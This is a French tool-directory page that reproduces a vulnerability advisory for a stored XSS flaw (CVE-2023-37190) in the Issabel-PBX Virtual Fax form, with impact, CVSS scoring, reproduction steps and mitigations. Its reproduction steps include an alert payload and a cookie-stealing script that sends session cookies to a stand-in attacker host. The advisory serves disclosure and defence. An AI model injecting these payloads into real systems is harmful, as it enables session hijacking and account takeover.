Skip to content
KitploitKITPLOIT
OutilsBlog
Soumettre
OutilsBlog
Soumettre

Outils de Hacking, PenTest et Cybersécurité pour votre Arsenal de Sécurité !

Kitploit est un répertoire d'outils de hacking, de cybersécurité et de pentesting. Découvrez les dernières mises à jour des projets pour trouver des vulnérabilités, analyser des systèmes, automatiser les tests et renforcer votre sécurité.

··Flux·Contact·Confidentialité·© 2026 Kitploit

Répertoire d'outils

Catégories

Voir toutes les catégories
Loading categories
CVE-2023-37190 — Une vulnérabilité de Cross-Site Scripting stocké (XSS) existe dans Issabel-PBX version 4.0.0-6. L'application ne parvient pas à nettoyer et encoder correctement les entrées fournies par l'utilisateur avant de les stocker dans la base de données et de les restituer dans l'interface web. | Kitploit
Outils/GitHubGitHub/sahiloj/cve-2023-37190
Analyse des VulnérabilitésExploitationExploitation d'Applications WebSécurité WebArticles et RechercheApprentissage et Éducation
GitHubsahiloj/cve-2023-37190

CVE-2023-37190

Voir le dépôt
11il y a 6 moisPas encore vérifié

Populaires

Voir tout →

Découvrez les outils les plus utilisés par notre communauté.

Explorer tous les outils

Parcourez notre collection d'outils

Voir tous les outils →

À propos

Une vulnérabilité de Cross-Site Scripting stocké (XSS) existe dans Issabel-PBX version 4.0.0-6. L'application ne parvient pas à nettoyer et encoder correctement les entrées fournies par l'utilisateur avant de les stocker dans la base de données et de les restituer dans l'interface web.

Partager

CVE-2023-37190 — Issabel-PBX 4.0.0-6 : Cross-Site Scripting stocké (XSS)

CVE Severity Type Affected Version


📋 Aperçu

ChampDétails
Identifiant CVECVE-2023-37190
VulnérabilitéCross-Site Scripting stocké (XSS)
Produit concernéIssabel-PBX
Version concernée4.0.0-6
SévéritéMoyenne (Score CVSS v3.1 : 5.4)
Découvert parSahil Ojha
Date de divulgation07 juillet 2023
ÉditeurIssabel
Code sourceIssabelFoundation/issabelPBX
Testé surWindows

📝 Description

Une vulnérabilité de Cross-Site Scripting stocké (XSS) existe dans Issabel-PBX version 4.0.0-6. L'application ne nettoie ni n'encode correctement les entrées utilisateur avant de les stocker dans la base de données et de les afficher dans l'interface web.

La vulnérabilité se trouve dans le module Fax virtuel, plus précisément dans le formulaire de création "Nouveau fax virtuel". Deux paramètres d'entrée — Nom du fax virtuel et Nom de l'appelant (Caller ID) — ne font l'objet d'aucune validation d'entrée ni d'encodage de sortie adéquats. Cela permet à un attaquant authentifié de faible privilège d'injecter et de stocker de manière permanente une charge utile JavaScript malveillante dans l'application.

Une fois stockée, la charge utile malveillante est automatiquement exécutée dans le navigateur de tout utilisateur (y compris les administrateurs) qui visite la page concernée, sans aucune interaction supplémentaire de la part de l'attaquant.


⚠️ Impact

Un attaquant qui exploite avec succès cette vulnérabilité peut :

  • Voler les cookies de session et détourner les sessions d'utilisateurs authentifiés, y compris les comptes administrateurs.
  • Effectuer des actions au nom des victimes, comme modifier des configurations, ajouter des utilisateurs ou changer les paramètres système.
  • Rediriger les utilisateurs vers des pages de phishing ou de distribution de malwares contrôlées par l'attaquant.
  • Défigurer l'interface de l'application, impactant l'expérience utilisateur et la confiance.
  • Distribuer des malwares ou des exploits de navigateur à tous les utilisateurs accédant à la page concernée.
  • Effectuer du keylogging ou capturer des informations sensibles saisies sur la page.

Étant donné que la charge utile est stockée (persistante), elle affecte chaque utilisateur qui visite la page vulnérable jusqu'à ce qu'elle soit supprimée — ce qui rend cette vulnérabilité plus grave qu'un XSS réfléchi.


🔢 Score CVSS v3.1


🔍 Détails de la vulnérabilité

  • Type de vulnérabilité : Cross-Site Scripting stocké (CWE-79)
  • Composant concerné : Module Fax virtuel → formulaire Nouveau fax virtuel
  • Paramètres vulnérables :
    • Nom du fax virtuel
    • Nom de l'appelant (Caller ID)
  • Authentification requise : Oui (utilisateur authentifié de faible privilège)
  • Cause racine : Absence de nettoyage des entrées et d'encodage des sorties sur les paramètres concernés avant stockage en base de données et affichage dans l'interface web.

🛠️ Étapes pour reproduire

Prérequis

  • Une instance en fonctionnement d'Issabel-PBX version 4.0.0-6.
  • Des identifiants valides pour un compte ayant accès au module Fax (utilisateur standard ou administrateur).

Étapes de reproduction

Étape 1 : Connectez-vous à l'application web Issabel-PBX avec des identifiants valides.

Étape 2 : Naviguez vers Fax → Virtual Fax → New Virtual Fax.

Injectez la charge utile XSS suivante dans les champs Virtual Fax Name et/ou Caller ID Name :

root@kitploit:~
<script>alert('XSS-CVE-2023-37190')</script>

Pour une preuve de concept plus percutante démontrant le vol de cookie de session (remarque : dans les vraies attaques, HTTPS est utilisé pour éviter d'exposer les cookies volés en transit) :

root@kitploit:~
<script>document.location='https://attaquant.com/vol?c='+document.cookie</script>

Le formulaire rempli avec la charge utile injectée doit ressembler à la capture d'écran ci-dessous :

Étape 2 - Injection de la charge utile XSS dans les champs Virtual Fax Name et Caller ID Name

Étape 3 : Cliquez sur le bouton Save pour soumettre le formulaire. La charge utile est maintenant stockée de manière persistante dans la base de données de l'application.

Étape 4 : Naviguez vers la page de liste des fax virtuels (ou demandez à un autre utilisateur — comme un administrateur — de visiter la page). Le script stocké s'exécutera automatiquement dans le navigateur du visiteur, comme illustré ci-dessous :

Étape 4 - Exécution de la charge utile XSS stockée dans le navigateur


🩹 Atténuation et correction

Les utilisateurs et administrateurs d'Issabel-PBX sont vivement invités à appliquer les mesures suivantes :

  1. Validation des entrées : Imposer une validation stricte côté serveur sur toutes les entrées fournies par l'utilisateur. Rejeter ou nettoyer les entrées contenant des caractères HTML spéciaux (<, >, ", ', &).
  2. Encodage des sorties : Appliquer un encodage de sortie contextuel (encodage d'entités HTML) lors du rendu des données fournies par l'utilisateur dans l'interface web afin d'empêcher l'exécution de scripts.
  3. Politique de sécurité du contenu (CSP) : Implémenter un en-tête HTTP Content-Security-Policy strict pour limiter les sources à partir desquelles les scripts peuvent être exécutés, réduisant ainsi l'impact des vulnérabilités XSS.
  4. Mise à jour / Correctif : Surveiller le dépôt officiel d'Issabel et appliquer tout correctif de sécurité publié par l'éditeur.
  5. Moindre privilège : Restreindre l'accès aux modules sensibles tels que le fax virtuel aux seuls utilisateurs qui en ont besoin, limitant ainsi la surface d'attaque.

📚 Références

  • NVD - CVE-2023-37190
  • Entrée MITRE CVE
  • Site officiel d'Issabel
  • IssabelFoundation/issabelPBX sur GitHub
  • CWE-79 : Neutralisation incorrecte des entrées lors de la génération de pages web ('Cross-site Scripting')
  • OWASP : Cross-Site Scripting (XSS)

👤 Auteur

Sahil Ojha
Chercheur en sécurité
GitHub : @sahiloj


Avertissement : Ce dépôt est destiné à des fins éducatives et de divulgation responsable uniquement. Les informations fournies ici ne doivent pas être utilisées pour attaquer des systèmes sans autorisation écrite explicite du propriétaire du système. L'auteur n'est pas responsable de toute utilisation abusive de ces informations.

Télécharger l’outil
MétriqueValeur
Score de base5.4 (Moyenne)
Vecteur d'attaqueRéseau
Complexité de l'attaqueFaible
Privilèges requisFaible
Interaction utilisateurRequise
PérimètreModifié
ConfidentialitéFaible
IntégritéFaible
DisponibilitéAucune